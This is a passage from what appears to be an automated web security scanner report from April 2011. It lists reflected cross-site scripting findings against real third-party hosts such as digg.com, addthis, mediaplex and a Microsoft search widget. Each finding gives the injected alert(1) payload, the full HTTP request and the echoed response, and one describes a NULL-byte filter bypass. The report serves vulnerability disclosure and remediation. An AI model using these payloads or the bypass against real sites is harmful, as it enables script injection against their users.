Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: btilelog.access.mapquest.com

Response

HTTP/1.1 400 Bad Request
Date: Mon, 18 Apr 2011 15:44:56 GMT
Server: Apache
Content-Length: 79
Cache-Control: max-age=300
Expires: Mon, 18 Apr 2011 15:49:56 GMT
Connection: close
Content-Type: text/plain

Bad Request (unknown command) scriptd3225<script>alert(1)</script>5267428e12c
4.3. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 5d490<script>alert(1)</script>6c07b23ce7c was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAD-JXpIE~,2UdjlQofkYVVekkI7wu0XeNF7ORIavpH HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 558

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q40fa004b3547ab3a0ff840506fbf51f7cc0b5520
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Mon, 18 Apr 2011 14:35:19 GMT
Server:
Content-Length: 3745

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
/..I....eAQ~~,AAAAD-JXpIE~,2UdjlQofkYVVekkI7wu0XeNF7ORIavpH.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bb..Kb ....ivideoPlayer5d490<script>alert(1)</script>6c07b23ce7c.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...
4.4. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a58a7"><script>alert(1)</script>77bba122453 was submitted in the REST URL parameter 1. This input was echoed as a58a7"><script>alert(1)</script>77bba122453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00a58a7"><script>alert(1)</script>77bba122453 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 01:51:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076166248%3A200; expires=Tue, 19-Apr-2011 01:51:14 GMT; path=/; domain=digg.com
Set-Cookie: d=075a1b6a89f9b59d7a37b2048cfaf45f82af5bfdf9358fea56c7ba2ef0d630b4; expires=Sat, 17-Apr-2021 11:58:54 GMT; path=/; domain=.digg.com
X-Digg-Time: D=467628 10.2.128.108
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16389

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00a58a7"><script>alert(1)</script>77bba122453.rss">
...[SNIP]...
4.5. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/vasco.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 12318<script>alert(1)</script>93554ce024a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr12318<script>alert(1)</script>93554ce024a&uid=4dab4fa85facd099&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fsitemap.aspx&ip8zpn HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uit=1; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 453
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 18 Apr 2011 10:24:56 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; Domain=.addthis.com; Expires=Sun, 17 Jul 2011 10:24:56 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 18 May 2011 10:24:56 GMT; Path=/
Set-Cookie: di=%7B%7D..1303122296.1FE|1303122296.60|1303122296.66; Domain=.addthis.com; Expires=Wed, 17-Apr-2013 10:24:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 18 Apr 2011 10:24:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 10:24:56 GMT
Connection: close

_ate.ad.hpr12318<script>alert(1)</script>93554ce024a({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fvasco.com%2
...[SNIP]...
4.6. http://ds.addthis.com/red/psi/sites/www.curtis.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.curtis.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f7304<script>alert(1)</script>4ee0dbebf63 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.curtis.com/p.json?callback=_ate.ad.hprf7304<script>alert(1)</script>4ee0dbebf63&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.curtis.com%2Fsitecontent.cfm%3Fpageid%3D11&ref=http%3A%2F%2Fwww.curtis.com%2Fsitecontent.cfm%3Fpageid%3D11&9smkta HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uit=1; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1303122295.1FE|1303122295.60|1303122322.66; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 18 Apr 2011 17:00:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 18 May 2011 17:00:32 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 18 Apr 2011 17:00:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 17:00:32 GMT
Connection: close

_ate.ad.hprf7304<script>alert(1)</script>4ee0dbebf63({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
4.7. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 83bd9<script>alert(1)</script>9fdcd05d786 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.martindale.com%2Fall%2Fc-england%2Fall-lawyers.htm%3Fn%3D4294962592%26dv%3Dadd%7CCity%5EBirmingham%26c%3DD&uid=ZC45X9Axu6NOUFfX_32161183bd9<script>alert(1)</script>9fdcd05d786&xy=0%2C0&wh=160%2C600&vchannel=76289&cid=151354&iad=1303088636437-24098835326731204&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=51F08BBF89654C7FA20B932E6BA89916; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Mon, 18 Apr 2011 01:03:44 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_32161183bd9<script>alert(1)</script>9fdcd05d786");
4.8. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 34b29<img%20src%3da%20onerror%3dalert(1)>a50142f4ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34b29<img src=a onerror=alert(1)>a50142f4ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&34b29<img%20src%3da%20onerror%3dalert(1)>a50142f4ff4=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc308589?9fba4%22%3E%3Ca%3Ea6f4837759d=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: c27d9e150535db3d74b0587f816e3483
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Tue, 19 Apr 2011 01:50:02 GMT
Date: Mon, 18 Apr 2011 13:50:02 GMT
Connection: close
Content-Length: 12915


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&34b29<img src=a onerror=alert(1)>a50142f4ff4=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...
4.9. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ac1e'%3balert(1)//347fd78e021 was submitted in the mpck parameter. This input was echoed as 2ac1e';alert(1)//347fd78e021 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D333120119182ac1e'%3balert(1)//347fd78e021&mpt=33312011918&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:25 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 3828
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-124632-26209-0?mpt=333120119182ac1e';alert(1)//347fd78e021" target="_blank">
...[SNIP]...
4.10. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffb5"-alert(1)-"b3233047e0a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D333120119183ffb5"-alert(1)-"b3233047e0a&mpt=33312011918&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:23 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 3822
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D333120119183ffb5"-alert(1)-"b3233047e0a");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D333120119183ffb5"-alert(1)-"b3233047e0a");
mpck
...[SNIP]...
4.11. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36dda'%3balert(1)//0e6f7d676f4 was submitted in the mpvc parameter. This input was echoed as 36dda';alert(1)//0e6f7d676f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D33312011918&mpt=33312011918&mpvc=36dda'%3balert(1)//0e6f7d676f4 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:45 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 3824
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="36dda';alert(1)//0e6f7d676f4http://altfarm.mediaplex.com/ad/ck/16228-124632-26209-0?mpt=33312011918" target="_blank">
...[SNIP]...
4.12. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b279"%3balert(1)//a2e6ef3a614 was submitted in the mpvc parameter. This input was echoed as 9b279";alert(1)//a2e6ef3a614 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D33312011918&mpt=33312011918&mpvc=9b279"%3balert(1)//a2e6ef3a614 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:43 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 3824
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("9b279";alert(1)//a2e6ef3a614");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("9b279";alert(1)//a2e6ef3a614");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("9b279"%3balert(1)//a2e6ef3a614");
...[SNIP]...
4.13. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3a38"-alert(1)-"f6d1348eaec was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918e3a38"-alert(1)-"f6d1348eaec&mpt=33312011918&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:23 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 3812
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918e3a38"-alert(1)-"f6d1348eaec");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918e3a38"-alert(1)-"f6d1348eaec");
mpck
...[SNIP]...
4.14. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a08cc'%3balert(1)//b46291c3ea9 was submitted in the mpck parameter. This input was echoed as a08cc';alert(1)//b46291c3ea9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918a08cc'%3balert(1)//b46291c3ea9&mpt=33312011918&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:25 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 3818
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-124632-26209-1?mpt=33312011918a08cc';alert(1)//b46291c3ea9" target="_blank">
...[SNIP]...
4.15. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e955d"%3balert(1)//9292326dcad was submitted in the mpvc parameter. This input was echoed as e955d";alert(1)//9292326dcad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918&mpt=33312011918&mpvc=e955d"%3balert(1)//9292326dcad HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:43 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 3814
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("e955d";alert(1)//9292326dcad");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("e955d";alert(1)//9292326dcad");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("e955d"%3balert(1)//9292326dcad");
...[SNIP]...
4.16. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
